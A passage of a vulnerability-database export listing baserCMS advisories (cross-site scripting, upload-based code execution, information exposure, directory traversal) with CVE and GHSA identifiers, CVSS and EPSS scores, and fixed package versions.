Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
reference_id
reference_type
scores
0
value 0.02281
scoring_system epss
scoring_elements 0.85006
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-26128
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
reference_id CVE-2024-26128
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-26128
5
reference_url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jjxq-m8h3-4vw5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
reference_id GHSA-jjxq-m8h3-4vw5
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-12T15:20:28Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jjxq-m8h3-4vw5
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2024-26128, GHSA-jjxq-m8h3-4vw5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxrf-64er-xbfx
32
url VCID-p695-t9ye-v3ga
vulnerability_id VCID-p695-t9ye-v3ga
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Edit Email Form Settings Feature
XSS vulnerability in the Edit Email Form Settings feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
reference_id
reference_type
scores
0
value 0.01064
scoring_system epss
scoring_elements 0.7805
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46998
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_98693329
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://basercms.net/security/JVN_98693329
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
reference_id CVE-2024-46998
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46998
5
reference_url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
url https://github.com/advisories/GHSA-p3m2-mj3j-j49x
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
reference_id GHSA-p3m2-mj3j-j49x
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T20:01:19Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-p3m2-mj3j-j49x
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46998, GHSA-p3m2-mj3j-j49x
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p695-t9ye-v3ga
33
url VCID-p6nr-eu91-53b4
vulnerability_id VCID-p6nr-eu91-53b4
summary
Cross-site Scripting
baserCMS is affected by Cross Site Scripting (XSS) and Remote Code Execution (RCE). This may be executed by logging in as a system administrator and uploading an executable script file such as a PHP file. The affected components are `ThemeFilesController.php` and `UploaderFilesController.php`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15159
reference_id
reference_type
scores
0
value 0.01563
scoring_system epss
scoring_elements 0.8186
published_at 2026-06-05T12:55:00Z
1
value 0.01563
scoring_system epss
scoring_elements 0.81826
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15159
1
reference_url https://basercms.net/security/20200827
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/20200827
2
reference_url https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/16a7b3cd09a0ca355474119c76897eac2034a66d
3
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-673x-f5wx-fxpw
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15159
reference_id CVE-2020-15159
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15159
5
reference_url https://github.com/advisories/GHSA-673x-f5wx-fxpw
reference_id GHSA-673x-f5wx-fxpw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-673x-f5wx-fxpw
fixed_packages
0
url pkg:composer/baserproject/basercms@4.3.7
purl pkg:composer/baserproject/basercms@4.3.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-eq7f-n3g5-s3hu
11
vulnerability VCID-g56w-z9cx-5ygv
12
vulnerability VCID-ggv8-3v9t-mfea
13
vulnerability VCID-hpk4-a6tr-3ffe
14
vulnerability VCID-j37y-gws9-ake9
15
vulnerability VCID-jby7-s5ez-dqb3
16
vulnerability VCID-k575-suuf-7bhf
17
vulnerability VCID-k5qv-4yp3-zbgf
18
vulnerability VCID-khft-xvrw-g3dr
19
vulnerability VCID-kmpp-6j49-pqfz
20
vulnerability VCID-mfm9-gsh3-ubg8
21
vulnerability VCID-nxrf-64er-xbfx
22
vulnerability VCID-p695-t9ye-v3ga
23
vulnerability VCID-pd8c-9d7z-zkhg
24
vulnerability VCID-sqr4-v889-tff8
25
vulnerability VCID-twf5-bzba-gqb4
26
vulnerability VCID-u16w-rbuk-ybfs
27
vulnerability VCID-uedz-j2vn-cbea
28
vulnerability VCID-wvnk-63hy-ykeq
29
vulnerability VCID-xpsb-2yux-g3cf
30
vulnerability VCID-xxud-7jsh-bbc1
31
vulnerability VCID-y2sz-c6vb-pkdp
32
vulnerability VCID-zqd4-rdem-jfgk
33
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7
aliases CVE-2020-15159, GHSA-673x-f5wx-fxpw
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p6nr-eu91-53b4
34
url VCID-pd8c-9d7z-zkhg
vulnerability_id VCID-pd8c-9d7z-zkhg
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
reference_id
reference_type
scores
0
value 0.00572
scoring_system epss
scoring_elements 0.69062
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43647
1
reference_url https://basercms.net/security/JVN_24381990
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://basercms.net/security/JVN_24381990
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/commit/eb5977533d05db4f3bb03bd19630b66052799b2e
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43647
5
reference_url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
url https://github.com/advisories/GHSA-ggj4-78rm-6xgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
reference_id GHSA-ggj4-78rm-6xgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T20:12:52Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-ggj4-78rm-6xgv
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43647, GHSA-ggj4-78rm-6xgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pd8c-9d7z-zkhg
35
url VCID-r4jc-22rq-d3cb
vulnerability_id VCID-r4jc-22rq-d3cb
summary
Information Exposure
baserCMS allows remote attackers to bypass access restriction in mail form to view a file which is uploaded by a site user via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0575
reference_id
reference_type
scores
0
value 0.00169
scoring_system epss
scoring_elements 0.37823
published_at 2026-06-04T12:55:00Z
1
value 0.00169
scoring_system epss
scoring_elements 0.37914
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0575
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0575
reference_id CVE-2018-0575
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0575
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0575, GHSA-w935-p7mg-xc96
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r4jc-22rq-d3cb
36
url VCID-sqr4-v889-tff8
vulnerability_id VCID-sqr4-v889-tff8
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts and Contents list Feature
XSS vulnerability in the Blog posts and Contents list feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
reference_id
reference_type
scores
0
value 0.01179
scoring_system epss
scoring_elements 0.79112
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46994
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
reference_id CVE-2024-46994
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46994
4
reference_url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
url https://github.com/advisories/GHSA-wrjc-fmfq-w3jr
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
reference_id GHSA-wrjc-fmfq-w3jr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:44Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-wrjc-fmfq-w3jr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46994, GHSA-wrjc-fmfq-w3jr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sqr4-v889-tff8
37
url VCID-u16w-rbuk-ybfs
vulnerability_id VCID-u16w-rbuk-ybfs
summary
baserCMS Directory Traversal vulnerability in Form submission data management Feature
There is a Directory Traversal vulnerability in the Form submission data management feature of baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.

### Target
baserCMS 4.7.8 and earlier versions

### Vulnerability
There is a possibility that information on the server may be obtained by a user who is logged in to the management screen.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_45547161

### Credits
Shiga Takuma@BroadBand Security, Inc
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
reference_id
reference_type
scores
0
value 0.00289
scoring_system epss
scoring_elements 0.52624
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43648
1
reference_url https://basercms.net/security/JVN_81174674
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:22:00Z/
url https://basercms.net/security/JVN_81174674
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
